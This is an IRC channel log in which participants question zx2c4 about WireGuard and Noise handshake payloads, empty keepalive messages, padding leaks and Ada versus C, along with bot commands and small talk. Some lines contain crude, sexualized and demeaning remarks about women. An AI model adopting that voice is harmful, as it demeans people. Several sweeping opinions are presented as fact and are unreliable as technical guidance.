1797307;1523551827;mircea_popescu;asciilifeform seems to me the case to be, that they defined a matrix, and then implemented all the cells, and fuck you if you pick a dumb cell. 1797308;1523551849;zx2c4;there are valid use cases of sending information in the clear in the payload parameter. for example, perhaps you want to use it to advertise which aspects of the protocol are valid for subsequent messages. or you want to send a certificate along to authenticate yourself. the payload parameter certainly shouldnt be confused with transport messages, which are what are allowed after the handshake completes 1797309;1523551851;mircea_popescu;the ready argument for doing it this way is simplicity. 1797310;1523551889;zx2c4;this is not the case of the "null mode" in IPsec, which is obviously a complete disaster with no good justification 1797311;1523551889;asciilifeform;mircea_popescu: what i see is, the cell is there, but there is no indication that it is connected , as it ought to be, to red lights, siren, and dropping of reactor moderator rods 1797312;1523551900;mircea_popescu;they saved on the loc. 1797313;1523551908;asciilifeform;lol 1797314;1523551909;zx2c4;its not about LoC either. 1797315;1523551917;mircea_popescu;zx2c4 for the public record, make the "this is not the case" distinction plain. 1797316;1523551922;mircea_popescu;how is it not the same thing ? 1797317;1523551966;zx2c4;because IPsec's null cipher mode is for transport data. what youre asking about with 7.4 is the payload parameter of the handshake messages 1797318;1523552009;zx2c4;one thing to keep in mind is that Noise isn't a single ready-made protocol for every application designer to take. its instead a protocol framework for protocol designers to use. knowing explicitly what the payload param gives you in each message is really important, so that you dont screw up and put your stuff somewhere it shouldnt be. there are legitimate protocol use cases for using the payload parameter early on during the handshake. its 1797319;1523552009;zx2c4;important to then know what level of confidentiality you get there 1797320;1523552029;mircea_popescu;so in no case a dizzy operator could naively set up noise 7.4 so as to send his payloads in plaintext. 1797321;1523552059;mircea_popescu;this is principally enforced by dizzy operators not touching the framework in the first place, but only given implementations of it. 1797322;1523552063;zx2c4;pretty unlikely that somebody would design a protocol inadvertently that way 1797323;1523552067;mircea_popescu;right. 1797324;1523552075;zx2c4;which is why trevor explicitly spells it out 1797325;1523552076;mircea_popescu;ok, now to my bit : poach 1797326;1523552082;zx2c4;i remember asking for this on the mailing list at some point 1797327;1523552089;mircea_popescu;oops . i mean : http://btcbase.org/log/2018-04-12#1797270 1797328;1523552089;a111;Logged on 2018-04-12 16:44 mircea_popescu: http://btcbase.org/log/2018-04-12#1796991 << let me ask you this then : why do you send an encrypted empty message when heartbeat fails ? 1797329;1523552089;asciilifeform;( alternatively, how many bits do i need to flip in an otherwise correctly configured box, to set a 'noise' cipherer, into null mode ? ) 1797330;1523552099;zx2c4;also, btw, when you're not using the payload parameter in a message, it's just set to empty, because the authentication tag used by it is still important for the protocol. 1797331;1523552107;mircea_popescu;asciilifeform he can't answer that, because it'd be implementation dependant. 1797332;1523552114;asciilifeform;fair'nuff 1797333;1523552137;mircea_popescu;zx2c4 the fundamental problem with "set to empty" is that ciphers can be and many are vulnerable to this, as a particular case of "known plaintext" 1797334;1523552140;zx2c4;empty message when heartbeat fails? huh? 1797335;1523552146;mircea_popescu;let me quote your exact line. 1797336;1523552180;mircea_popescu;"If a packet has been received from a given peer, but we have not sent one back to the given peer in KEEPALIVE ms, we send an empty packet." << 1797337;1523552203;zx2c4;oh. good question 1797338;1523552215;mircea_popescu;i can't use the trilema-style url-reference (here's an example : http://trilema.com/2018/boboban/#selection-47.0-47.10 ) because you don't have implemented. but it's from the /protocol page 1797339;1523552332;zx2c4;every time i send you something, i expect to hear back from you. if i dont hear back from you, then something bad has happened,and i should start over with a new handshake. my way of hearing back to you might be in the natural sense -- i send a TCP SYN, you send me back a TCP ACK -- or it might be the case that you actually just have nothing to send back to me. you got my message just fine, but really just cant think of anything to say back to me. 1797340;1523552332;zx2c4;in this case, its important that you send me a keepalive, so that i know you at least got it. however, these keepalives arent persistent. if subsequently, i have nothing more to say to you, then we both go silent and dont say anything. 1797341;1523552350;mircea_popescu;this far we agree. 1797342;1523552361;mircea_popescu;now, why is the thing you send an empty message ? 1797343;1523552404;zx2c4;because all i need is the valid authtag/nonce. i dont have any actual content to put in there 1797344;1523552425;zx2c4;(usually said messages contain an IP packet) 1797345;1523552429;mircea_popescu;so it is not "empty" in the sense of "" ; it is empty in the sense of the payload being null, but the actual message is in fact a nonce and some tags anyway. 1797346;1523552448;zx2c4;yea. the plaintext is empty. but the ciphertext is not, since it's authenticated 1797347;1523552460;zx2c4;in otherwords, the empty plaintext is still a valid value to be authenticated-encrypted 1797348;1523552466;mircea_popescu;can you off the top of your head give me a dummy example of such ? 1797349;1523552482;asciilifeform;zx2c4: it would appear that you have a known-plaintext though 1797350;1523552485;asciilifeform;in such a message 1797351;1523552494;mircea_popescu;asciilifeform depends on how he makes the nonce. 1797352;1523552497;asciilifeform;right 1797353;1523552513;zx2c4;im not seeing the vulnerability youre speaking about 1797354;1523552533;zx2c4;normally when you encrypt a message of 32 bytes, you get 32 bytes of cipher text + 16 bytes of authentication tag 1797355;1523552533;mircea_popescu;zx2c4 here's a simple alternative to consider : would you agree the assemblage would be more secure if instead of sending a null payload you sent a random string ? 1797356;1523552535;asciilifeform;mircea_popescu do you have a link to the famous penguin handy ? 1797357;1523552542;zx2c4;when you encrypt a message of 0 bytes, you get 0 bytes of ciphertext + 16 bytes of authentication tag 1797358;1523552548;mircea_popescu;right. 1797359;1523552555;mircea_popescu;and if i encrypt 8 bytes, what do i get ? 1797360;1523552556;zx2c4;no, i dont think sending a random string would make it more secure 1797361;1523552577;zx2c4;normally 8+16 (though wireguard pads to nearest 16) 1797362;1523552598;mircea_popescu;and if my slut eve in the other room is listening in, she can distinguish the case where i sent 0 from the case where i sent 8 ? 1797363;1523552619;zx2c4;thats right. the padding only happens in multiples of 16 1797364;1523552632;mircea_popescu;so wouldn't it make sense for me to send 8 whether i have anything to say or not ? 1797365;1523552635;zx2c4;so you can do traffic analysis on 16 byte chunks 1797366;1523552640;zx2c4;why? 1797367;1523552650;mircea_popescu;so that eve can't distinguish silent keepalive from actual convo ? 1797368;1523552650;zx2c4;what do you get by knowing from inference that it's a keepalive? 1797369;1523552664;zx2c4;what is the attack here? 1797370;1523552671;mircea_popescu;why am i held to explain how a protocol breach can be elevated to arbitrary height ? the attracker FIND SOMETHING 1797371;1523552701;zx2c4;there _are_ attacks, on say voice compression algorithms, which can gather some information from having precise sizes alone, which is why things are padded to nearest 16. but i dont see what would be gathered by what youre suggesting 1797372;1523552714;asciilifeform;zx2c4: speaking in general of symmetric ciphers -- a known-plaintext instance anywhere in the stream, or even a means of narrowing down possible plaintext, makes for considerably cheaper break 1797373;1523552730;mircea_popescu;well, for instance, if i know six nodes in your network and know asciilifeform uses at most two, and i see those are not transmitting, i know he's asleep and send the titassassins. 1797374;1523552740;zx2c4;mircea_popescu: an attacker can also distinguish between a length 15 message and a length 31 message. i still maintain this doesnt give an attacker anything useful 1797375;1523552752;mircea_popescu;that may be, but we're discussing the 0 case. 1797376;1523552765;mircea_popescu;because i can turn a 31 message into two 15 messages or back ; but i can't turn 0 messages into anything else. 1797377;1523552775;zx2c4;you might be misunderstanding. when nothing is being sent at all, keepalives arent sent. simply no packets are sent 1797378;1523552776;mircea_popescu;this is the problem : you introduce a categorical breach with this system. 1797379;1523552789;mircea_popescu;zx2c4 suppose he is sending keepalives, what. 1797380;1523552810;zx2c4;then thoes keepalives are in response to some message he received 1797381;1523552846;asciilifeform;zx2c4: the distinguishability of keepalives also makes it considerably easier to carry out timing attack on your nonconstanttime ecc engine 1797382;1523552856;mircea_popescu;in any case, cryptography comes in two sorts : sort a), known here as "this must be secure, it's so confusing to me", and sort b). the moment you say "i can't see what this gives attacker" you force-shove yourself in group a. it's not your business to know the attacker, that's the whole fundamental philosophy of ciphering, that you do not need to know the attacker. 1797383;1523552857;asciilifeform;because i can tell when a particular message has been received and ack'd 1797384;1523552864;zx2c4;the ecc is constant time. but anyway the transport layer doesnt use any ecc 1797385;1523552874;zx2c4;transport layer is all symmetric crypto 1797386;1523552877;asciilifeform;it is demonstrably not constant time, on several popular machines, we went over this 1797387;1523552886;mircea_popescu;zx2c4 is this constant time ecc implementation on display somewhere btw ? i don't think i ever saw one before. 1797388;1523552893;asciilifeform;mircea_popescu: see log 1797389;1523552894;zx2c4;mircea_popescu: see logs 1797390;1523552896;mircea_popescu;aok 1797391;1523552987;zx2c4;mircea_popescu: padded protocols infoleak in multiples of the padding. you get to see if a given packet elicited a 0 reply, a 16 reply, a 32 reply, a 48 reply, and so forth 1797392;1523553039;zx2c4;this may indeed be too large of an infoleak and you'd prefer a different padding scheme like always filling the entire MTU 1797393;1523553077;zx2c4;(that way you give nothing, except your mtu) 1797394;1523553113;mircea_popescu;yes, that's how wer dop it. do you happen to be familiar with diana coman's work on the ada impl of rsa/keccak etc >? 1797395;1523553173;*;zx2c4 shakes head no 1797396;1523553183;mircea_popescu;anyway, the point here isn't that padded protocols infoleak in multiples of the paddiong., the point is that 0 is a special case invariant, and yhou can never leak a multiple of 0 safely. because, again, a message of arbitrary length n can be presented as m messages of length k ; but 0 messages can never carry anything. 1797397;1523553220;mircea_popescu;http://www.dianacoman.com/2017/12/07/introducing-eucrypt/ << it uses the v system ; are you familiar with v ? 1797398;1523553303;zx2c4;why do you think zero is a special case? 1797399;1523553306;zx2c4;i havent seen v 1797400;1523553318;zx2c4;what is it? 1797401;1523553368;mircea_popescu;one thing at a time : if an attacker observes a stream of n messages of lengths != 0, there is nothing he can infer : maybe they're part of one message, or maybe they're not, or maybe they don't even say anything. 1797402;1523553380;mircea_popescu;if however he observes a stream of n messages of length = 0, he can infer nothing was said. 1797403;1523553408;zx2c4;with many TCP protocols you can infer what's behind it based on the length 1797404;1523553417;mircea_popescu;this reduces your strength, like it or not, because ~attacker inferred something~. that's what strength is, "attacker doesn't infer". see the history of the concept of "ban" and hopw turning bamburismus'd. 1797405;1523553437;zx2c4;i suppose your point is that you _could_ choose to obscure the lengths of the messages youre sending back? whereas with zero that isnt a possibility? 1797406;1523553450;mircea_popescu;in that formulation, sure. 1797407;1523553457;zx2c4;thats an interesting consideration 1797408;1523553475;mircea_popescu;the problem is fundamental, though. the same EXACT thinking informs this problem as informs the earlier discussion with asciilifeform over null ciphers. 1797409;1523553491;mircea_popescu;you have to get it in your head, that 0 is an invariant, and permitting it is always dangerous, because it's not "just another number". 1797410;1523553508;mircea_popescu;and saying "multiples of k : 0, 8, 16" is NOT an enumeration of "similar things". 0 is dissimilar to everything else. 1797411;1523553582;mircea_popescu;anyway, as to the other one : v is the republican... well many things, but also works as a versioning system. here's a pretty picture to help the notion along : http://btcbase.org/patches << you can select from the drop menu to the left, see vaqrious trees extant. you can click on any item to see the patch it represents. 1797412;1523553590;mircea_popescu;sheit. phf what happened to clickable patchgraph!!1 1797413;1523553606;asciilifeform;mircea_popescu: it shows up here 1797414;1523553614;asciilifeform;mircea_popescu: iirc you need a svg-capable wwwtron 1797415;1523553630;mircea_popescu;ah my browser is not willing. cool. love ya phf ! 1797416;1523553634;zx2c4;fancy 1797417;1523553652;zx2c4;you guys have invented lots of things here 1797418;1523553652;asciilifeform;zx2c4: this isn't v per se tho, it is a graphical viewer for same 1797419;1523553656;asciilifeform;v per se is pretty simple 1797420;1523553663;asciilifeform;cascadianhacker.com/07_v-tronics-101-a-gentle-introduction-to-the-most-serene-republic-of-bitcoins-cryptographically-backed-version-control-system << likbez 1797421;1523553704;mircea_popescu;the idea with it is that patches must be a) clearly assigned to a responsible key and b) well read. actually, not putatively a la ers's trillion dead fish eyes. 1797422;1523553762;mircea_popescu;asciilifeform did we ever establish why he wrote the thing in c ? 1797423;1523553781;asciilifeform;mircea_popescu: zx2c4's thing ? nope, notyet 1797424;1523553782;zx2c4;http://thebitcoin.foundation/v/V-20180222.tar.gz this 1797425;1523553802;zx2c4;it's written in C because its in the linux kernel, which is written in C 1797426;1523553810;zx2c4;kernel for performance and integration reasons 1797427;1523553810;mircea_popescu;that's a perl impl of a v tool by mod6 ; everyone is invited to make their own v tools. 1797428;1523553811;zx2c4;however 1797429;1523553814;mircea_popescu;zx2c4 you ever used ada ? 1797430;1523553815;zx2c4;we've also got implementations in Rust and Go 1797431;1523553827;zx2c4;that are userspace based 1797432;1523553833;asciilifeform;zx2c4, mircea_popescu : it is quite trivial to build a kernel mod with gnat 1797433;1523553842;asciilifeform;( iirc i posted a cookbook re same, while back ) 1797434;1523553842;mircea_popescu;that was my next answer, yes. 1797435;1523553870;zx2c4;ada kernel modules? cool 1797436;1523553884;asciilifeform;( it is however presently unclear to me why the entire ciphrator has to live in kernelspace. granted the packet-thrower perhaps must. but why whole thing. ) 1797437;1523553884;mircea_popescu;could you guess, zx2c4 , why we would favour ada for finnicy work such as crypto libs ? 1797438;1523553886;zx2c4;unlikely that'd make it upstream if i did wireguard that way, but neat that that's possible 1797439;1523553911;zx2c4;i dont have enough exposure to ada to say for certain. how come? 1797440;1523553913;mircea_popescu;and could you guess WHY it wouldn't make it upstream ? because ada object-links with c object code np. 1797441;1523553930;mircea_popescu;ima let alf explain why ada. 1797442;1523553940;zx2c4;linus has never been so happy about other languages in the kernel. for example, he rejected a C++ layer many years ago 1797443;1523553976;asciilifeform;i'ma cheat and cite my own article, http://www.loper-os.org/?p=1913 : '... in a heavily-restricted subset of the Ada programming language — the only currently-existing nonproprietary statically-compiled language which permits fully bounds-checked, pointerolade-free code and practically-auditable binaries. We will be using GNAT, which relies on the GCC backend.' 1797444;1523554010;asciilifeform;and add to this, that it has an actual paper standard, and minimal 'implementation-defined' rubbish (tho sadly not zero) 1797445;1523554023;zx2c4;cool 1797446;1523554033;asciilifeform;and doesn't require a multi-MB runtime. 1797447;1523554042;zx2c4;sounds great 1797448;1523554054;mircea_popescu;zx2c4 the good news is that i am now finally in a position to explain what EXACTLY is meant by "terrorist" : that feeling in http://btcbase.org/log/2018-04-12#1797417 when shit keeps coming and coming and coming up. what is it, if not spiritual terror ? 1797449;1523554054;a111;Logged on 2018-04-12 17:20 zx2c4: you guys have invented lots of things here 1797450;1523554057;zx2c4;performance is good? 1797451;1523554070;asciilifeform;there is absolutely no justification for the continued use of c, aka overflowlang, aka heapabuselang, since... oh, 1985. 1797452;1523554074;mircea_popescu;depends. performance on ACTUAL constanttime items is not so good. 1797453;1523554086;mircea_popescu;but that's related to how they can't even exist in c. 1797454;1523554111;asciilifeform;zx2c4: performance is difficult to compare; if you remove various safeguards, you get ~same binary as equiv c proggy would have produced on same ver of gcc. 1797455;1523554141;asciilifeform;( gnat , the ada compiler, is based on ordinary gcc ) 1797456;1523554162;zx2c4;so most checking is runtime instead of compile time then? 1797457;1523554177;mircea_popescu;actually, most crap is not even permitted. see all the pragmas. 1797458;1523554179;asciilifeform;if you switch the runtime checks on, you get a ~50% speed penalty in practice, vs 'naked c' 1797459;1523554205;asciilifeform;zx2c4: there is some quite 'fascist' compile-time checking. most noobs to the lang, spend a week or so getting their proggy to even build. 1797460;1523554213;zx2c4;hah i like that 1797461;1523554220;zx2c4;ill give ada a look. ive long heard about it but never dived in 1797462;1523554225;zx2c4;i need to head out for a bit now 1797463;1523554229;asciilifeform;the use of pointers, for instance, is discouraged, and their migration between scopes is prohibited 1797464;1523554234;zx2c4;but ill idle in here for a while and will be back in several hours mostlikely 1797465;1523554244;mircea_popescu;zx2c4 and the good news is, linus permitted ada modules before. 1797466;1523554254;zx2c4;ooo scoped pointers. thats nice 1797467;1523554298;zx2c4;https://github.com/alkhimey/Ada_Kernel_Module_Toolkit 1797468;1523554300;zx2c4;alright, ttyl guys 1797469;1523554303;mircea_popescu;later. 1797470;1523554305;asciilifeform;zx2c4: you can come back any time, you have voice now. 1797471;1523554310;asciilifeform;laters. 1797472;1523554313;zx2c4;:) 1797473;1523554314;zx2c4;slater 1797474;1523554595;mircea_popescu;these logs are getting ever huger. 1797475;1523554685;ckang;hey nice glad to see zx2c4 made it in 1797476;1523554709;mircea_popescu;word. you're building quite the diplomatic reputation for yourself, you know that ? 1797477;1523554721;ckang;lol i try and connect people ;) 1797478;1523554736;ckang;everything yall spoke about is way over my head 1797479;1523554743;ckang;still trying to soak it in 1797480;1523554754;mircea_popescu;anyway, guy got a bitcoin, meaning he can put however many more hours into the thing you're using, so wins all around. 1797481;1523554788;ben_vulpes;well they are a far cry from the mango gelato of mircea_popescu's haremfactory but goshdarn these alfajores are magical with coffee in the morning 1797482;1523554788;ckang;whats your opinion on it, as it stands currently? 1797483;1523554806;ckang;from a security perspective 1797484;1523554857;mircea_popescu;ckang too soon to say. 1797485;1523554885;mircea_popescu;ben_vulpes you should see the britt chocolate covered macadamia nuts. 1797486;1523554938;ben_vulpes;sounds tasty 1797487;1523554960;ben_vulpes;i have been seduced into liking sugary delights! 1797488;1523554991;mircea_popescu;hey, i didn't think i even liked girls, as a 14yo. people get strange ideas in their heads. 1797489;1523555018;ben_vulpes;(and it doesn't even have any chocolate...) 1797490;1523555041;mircea_popescu;lol 1797491;1523555133;mircea_popescu;they have chocolate alfajors tho, is yours just ddl ? 1797492;1523555142;ben_vulpes;aha 1797493;1523555170;ben_vulpes;experiments from the kitchen, im sure more variants with chocolate will appear as soon as i mention the idea 1797494;1523555200;mircea_popescu;generally the alfajor as a commercial item is two wafers, ddl in betrween, whole dipped in hard chocolate. 1797495;1523555214;ben_vulpes;mircea_popescu: the .htaccess files included with/generated by mpwp include the `Allow` incantation, which is not a thing in apache 2.4; trilema purports to run on 2.4.16; can the Order/Allow incantations be replaced with the 2.4-style Require? 1797496;1523555244;mircea_popescu;ben_vulpes wp doesn't actually care how .htaccess is implemented ; only that it works. 1797497;1523555271;ben_vulpes;huh danielpbarron mentioned to me that it writes the permalinks into .htaccess, this is not so? 1797498;1523555283;*;ben_vulpes has yet to put rubber to road on this, still researching 1797499;1523555294;mircea_popescu;not afaik. i linked you to a snippet lessee 1797500;1523555410;mircea_popescu;RewriteCond %{REQUEST_FILENAME} !-d << this sort of thing. 1797501;1523555429;mircea_popescu;it redirects missing file references into index.php ; that's how it does the url replace thing. 1797502;1523555486;ben_vulpes;aok so the Order/Allow can probably be swapped for the 'modern' Require styles 1797503;1523555505;ben_vulpes;ty mircea_popescu 1797504;1523555540;mircea_popescu;ben_vulpes all the Order deny,allow Deny from all Allow from x thing does is lock out by ip ; it's not even generated by wp itself ; it can be implemented any way, iptables, csf, whatever. 1797505;1523555581;ben_vulpes;in other modern scotchguardlifeamericana, these "100% cotton!" napkins are clearly coated with some heinous anti-absorbent "nanotech". yes, works to wipe crumbs off toddlerface but holyfuck is aggressively and annoyingly nonabsorbent. 1797506;1523555594;mircea_popescu;http://btcbase.org/log/2018-04-12#1797053 << should be interesting once spyked wakes up lel. 1797507;1523555594;a111;Logged on 2018-04-12 15:48 zx2c4: our two x25519 C implementations (32bit and 64bit) are actually generated by theorem proving software, so that we're sure they dont contain any errors 1797508;1523555675;ben_vulpes;i was halfway expecting to see the classic machinegeneratedliquishit objections 1797509;1523555694;ben_vulpes;tenor has certainly changed around here of late. 1797510;1523555708;mircea_popescu;http://btcbase.org/log/2018-04-12#1797078 << this looks almost like a Very Desperate Man (tm) writing say pcb wiring constraints. 1797511;1523555708;a111;Logged on 2018-04-12 15:53 zx2c4: https://git.zx2c4.com/WireGuard/tree/src/crypto/curve25519-fiat32.h 1797512;1523555721;asciilifeform;mircea_popescu: it's mechanically-unrolled . 1797513;1523555726;mircea_popescu;yeah. 1797514;1523555735;asciilifeform;i had example of this back in august, of comba. 1797515;1523555751;asciilifeform;runs ~30% faster simply on account of no loop. 1797516;1523555759;asciilifeform;( the pipe stays full ) 1797517;1523555770;mircea_popescu;the line 332 explosion is a fine example of this as any could be had. 1797518;1523555789;asciilifeform;why the author stopped where he did, and did not unroll ~all~ of the loops, i do not presently know 1797519;1523555835;ckang;'pull request are always welcome' :) as they say 1797520;1523555879;mircea_popescu;these are yet too high level matters to be practically approached by this "here's an impl" method. 1797521;1523555926;asciilifeform;to be fair, the thing isn't even obscenely lengthy, esp for a robo-generated proggy. ( it remains the case that i dislike c, and also ecc; but these are orthogonal concerns ) 1797522;1523555968;mircea_popescu;no, and compiled to 40kb, it's clear from this and plenty other signs the dood has the right ideas in his head. 1797523;1523555970;mircea_popescu;http://btcbase.org/log/2018-04-12#1797091 1797524;1523555970;a111;Logged on 2018-04-12 15:57 zx2c4: https://א.cc/wrlf5K8I voila 1797525;1523555978;asciilifeform;linked proggy is iirc by another d00d 1797526;1523555982;asciilifeform;but yes 1797527;1523555993;mircea_popescu;https://א.cc/wrlf5K8I voila 1797528;1523556000;asciilifeform;it resembles 'nano ecc' which at 1 point asciilifeform tried to port to trb 1797529;1523556004;mircea_popescu;i don't get it, what happened ? 1797530;1523556186;asciilifeform;re the aleph ? nfi 1797531;1523556279;mircea_popescu;mk. 1797532;1523556389;mircea_popescu;http://btcbase.org/log/2018-04-12#1797132 << this counterstructure argument is actually quite strong ; may indeed be stronger than the proponent realizes. 1797533;1523556389;a111;Logged on 2018-04-12 16:12 zx2c4: things like RSA boil down to number theory problems. but that's in a sense scarier than the set of problems that good block ciphers tend to boil down to. because it means that those primitives have lots of _structure_, and generally structure is something that can be exploited. just look at all the amazing and fantastic attacks on things with structure. so just boiling down to a [currently considered] "hard problem" doesn't provide as much solace 1797534;1523556475;mircea_popescu;http://btcbase.org/log/2018-04-12#1797136 << approximately zero, in that case, for good fundamental reasons to do with... the structure of theoretical possibility. 1797535;1523556475;a111;Logged on 2018-04-12 16:13 zx2c4: but even hardness of factoring... how hard is this actually? what number theoretic advances are right around the corner? 1797536;1523556606;mircea_popescu;http://btcbase.org/log/2018-04-12#1797142 << understand, the discussion here is re cryptographic hardness, not mathematical hardness ; as discussed otherplaces in the logs, the mathematical notion of difficulty is "what's the absolute hardest case this problem can yield", because they want to offer maximal flop guarantees ; cryptographically it is kinda opposite : what's the LOWEST difficulty a problem in this class may yield 1797537;1523556606;a111;Logged on 2018-04-12 16:15 zx2c4: shape packing? 1797538;1523556606;mircea_popescu;. because they want to put a MINIMUM floor in. so to a large degree mathematical discussions of hardness are not cryptographically useful. 1797539;1523556776;asciilifeform;ftr i got ~nowhere re: a proper approach to cryptohardness. 1797540;1523556797;asciilifeform;and afaik nobody's made any progress re subj since john von n. 1797541;1523556805;asciilifeform;(at least, not publicly.) 1797542;1523556855;BingoBoingo; i have been seduced into liking sugary delights! << It's scarcely been more than a month since a fractional alfajore gave you sugar shock 1797543;1523556894;asciilifeform;( what would 'getting somewhere' look like ? how about a general theory, or even ~study of particular case, like aes~ re how many bits of key are leaked per, say, TB of ciphertext ) 1797544;1523556953;asciilifeform;right now 2 types of cipher are known -- otp, and errythingelse. only re otp is there a mathematical statement of any substance ( i.e. it is degenerate case, leaks 0 bits ) 1797545;1523556991;ben_vulpes;BingoBoingo: that thing was way too way over the top 1797546;1523557016;BingoBoingo;ben_vulpes: That think was the commercial item that defines the standard 1797547;1523557063;trinque;!!up britknee 1797548;1523557064;deedbot;britknee voiced for 30 minutes. 1797549;1523557115;BingoBoingo;Now, there's also "alfajores integrals" where a birdseed paste is smashed between two birdseed wafers, but those cost ~70 pesos whereas alfajores verdaderos costs 20-30 pesos 1797550;1523557191;ben_vulpes;im generally suspicious of food from plastic bags 1797551;1523557316;asciilifeform;http://btcbase.org/log/2018-04-12#1797536 << we may have had the thread iirc, but : cryptographic 'lowest difficulty' is inescapably statistical, considering that there is a nonzero and calculable probability of guessing a key ( under any system which is not otp, i.e. correct key is somehow distinguishable from the space of possible rubbish key ) 1797552;1523557316;a111;Logged on 2018-04-12 18:10 mircea_popescu: http://btcbase.org/log/2018-04-12#1797142 << understand, the discussion here is re cryptographic hardness, not mathematical hardness ; as discussed otherplaces in the logs, the mathematical notion of difficulty is "what's the absolute hardest case this problem can yield", because they want to offer maximal flop guarantees ; cryptographically it is kinda opposite : what's the LOWEST difficulty a problem in this class may yield 1797553;1523557418;asciilifeform;so what you'd want to prove is that there exists ~no~ method more effective than brute guess, for $system. 1797554;1523557553;asciilifeform;( 1 possible variant formulation of this : you want to prove that it is not possible to quickly skip over any portion of key space ) 1797555;1523557556;asciilifeform;!!up avgjoe 1797556;1523557557;deedbot;avgjoe voiced for 30 minutes. 1797557;1523557600;avgjoe;hello, can i ask why deedbot doesn't send me the challange to solve? instead it tells me that i should not up myself 1797558;1523557618;asciilifeform;!!reputation avgjoe 1797559;1523557620;deedbot;http://p.bvulpes.com/pastes/65zXa/?raw=true 1797560;1523557630;asciilifeform;!!key avgjoe 1797561;1523557632;deedbot;http://wot.deedbot.org/BCDC7D8A27D1AEE678925A1ED829570EDC4574F5.asc 1797562;1523557674;asciilifeform;!#s from:avgjoe 1797563;1523557674;a111;11 results for "from:avgjoe", http://btcbase.org/log-search?q=from%3Aavgjoe 1797564;1523557691;asciilifeform;seems like nobody rated you yet, avgjoe 1797565;1523557693;asciilifeform;let's fix: 1797566;1523557698;asciilifeform;!!rate avgjoe 1 new blood 1797567;1523557702;deedbot;Get your OTP: http://p.bvulpes.com/pastes/578NH/?raw=true 1797568;1523557724;asciilifeform;!!v DCD764A8C0F6748C7B7549E53AD453D4E1A51D469C59A0E9E9173300B8A14933 1797569;1523557725;deedbot;asciilifeform rated avgjoe 1 << new blood 1797570;1523557743;asciilifeform;avgjoe: you should be able to self-voice now. 1797571;1523557751;avgjoe;what means NIL here: http://p.bvulpes.com/pastes/65zXa/?raw=true ? 1797572;1523557764;asciilifeform;avgjoe: it means that you had no ratings. 1797573;1523557786;mircea_popescu;asciilifeform it can't be a debit like that, because the main unknown is the approach. 1797574;1523557790;asciilifeform;( it is also empty set in lisp ) 1797575;1523557799;asciilifeform;mircea_popescu: plox to elaborate 1797576;1523557801;mircea_popescu;what's it help you to know it's "0.1 bits per tb ~on average~" 1797577;1523557815;asciilifeform;mircea_popescu: asking not for average, but for bounds 1797578;1523557837;avgjoe;ok thanks, so after someone rates me deedbot allows to up me on demand? 1797579;1523557844;asciilifeform;averages don't help much, if it's '0 on whole week but certain death on tuesday noon' 1797580;1523557851;mircea_popescu;quite. 1797581;1523557858;mircea_popescu;avgjoe yes. 1797582;1523557860;mircea_popescu;!!up TrixxC 1797583;1523557861;deedbot;TrixxC voiced for 30 minutes. 1797584;1523557876;TrixxC;hi am here to register for tits 1797585;1523557883;mircea_popescu;go for it. 1797586;1523557925;mircea_popescu;TrixxC 0b8d3306 < 1797587;1523557962;britknee;hi mircea_popescu 1797588;1523557985;mircea_popescu;how goes britknee 1797589;1523557989;britknee;having issue with balance 1797590;1523558002;britknee;trinque said it needs verify 1797591;1523558008;mircea_popescu;lemme check 1797592;1523558018;britknee;ty 1797593;1523558088;mircea_popescu;britknee right he is, somehow slipped through the cracks. sorry for the delay ; but it's done now. 1797594;1523558119;britknee;all good ty 👍 1797595;1523558130;ben_vulpes;not so average joe 1797596;1523558133;asciilifeform;http://btcbase.org/log/2018-04-12#1797532 << as far as i can tell the 'rsa has structure! but aes, surely not' is instance of minsky's empty room ( http://btcbase.org/log/2014-11-13#920444 ) 1797597;1523558133;a111;Logged on 2018-04-12 18:06 mircea_popescu: http://btcbase.org/log/2018-04-12#1797132 << this counterstructure argument is actually quite strong ; may indeed be stronger than the proponent realizes. 1797598;1523558133;a111;Logged on 2014-11-13 23:07 mircea_popescu: In the days when Sussman was a novice, Minsky once came to him as he sat hacking at the PDP-6. 1797599;1523558139;mircea_popescu;britknee where's your friends ? 1797600;1523558155;mircea_popescu;asciilifeform yes well. one thing at a time huh :D 1797601;1523558165;britknee;you want more pics with #? 1797602;1523558173;mircea_popescu;britknee i'm here all week! 1797603;1523558183;asciilifeform;mircea_popescu: aite, i'ma return to packing launch capsule, bbl 1797604;1523558185;mircea_popescu;well, actually about to go to the beach right now, but in general speaking. 1797605;1523558203;britknee;oh I will put the word out then 1797606;1523558223;britknee;enjoy the beach 1797607;1523558262;mircea_popescu;you seen the pics ? 1797608;1523558298;britknee;link? 1797609;1523558327;mircea_popescu;http://trilema.com/2018/land-of-coffee-land-of-winds-land-of-oddly-moistened-bints/ << that's from the day i died at sea 1797610;1523558331;BingoBoingo;Ah, the seekrit beach 1797611;1523558340;mircea_popescu;but if you look through that category ("la pas prin lume") there's a ton of various. 1797612;1523558343;britknee;bints lol, rare word 1797613;1523558352;mircea_popescu;are you actually british ? 1797614;1523558363;britknee;no, britney 1797615;1523558368;mircea_popescu;close enough. 1797616;1523558386;mircea_popescu;but are you from uruguay ? because BingoBoingo tells me you look uruguashan. 1797617;1523558405;britknee;hispanic 1797618;1523558410;mircea_popescu;!!up sashahsas 1797619;1523558411;deedbot;sashahsas voiced for 30 minutes. 1797620;1523558413;mircea_popescu;!!up kittycollector 1797621;1523558414;deedbot;kittycollector voiced for 30 minutes. 1797622;1523558415;britknee;columbia and mexico 1797623;1523558421;mircea_popescu;voice for all teh girls! 1797624;1523558432;mircea_popescu;britknee oh, i was in columbia recently. 1797625;1523558466;mircea_popescu;http://trilema.com/2018/bogota-a-mixed-bag/ << there. you ever go to bogota ? 1797626;1523558468;britknee;I haven't actually been, by blood 1797627;1523558473;mircea_popescu;a. 1797628;1523558658;TrixxC;i brb there is someone at door 1797629;1523558749;mircea_popescu;http://btcbase.org/log/2018-04-12#1797184 << you definitely should do that, seeing how the superficial "was reviewed" claim collapses upon the most cursory scrutiny. this is not a good state to put yourself into, it makes it too easy to be painted with unflattering brushes. 1797630;1523558749;a111;Logged on 2018-04-12 16:25 zx2c4: i havent compiled a list of Name+WrittenReview. maybe i should do that 1797631;1523558796;mircea_popescu;i dunno what your experience with "peer review" is, but as far as anyone involved is aware, exactly no review goes on in those circumstances. see sokal & all. 1797632;1523558828;mircea_popescu;!#s "Transgressing the Boundaries: Towards a Transformative Hermeneutics of Quantum Gravity" 1797633;1523558828;a111;0 results for "\"Transgressing the Boundaries: Towards a Transformative Hermeneutics of Quantum Gravity\"", http://btcbase.org/log-search?q=%22Transgressing%20the%20Boundaries%3A%20Towards%20a%20Transformative%20Hermeneutics%20of%20Quantum%20Gravity%22 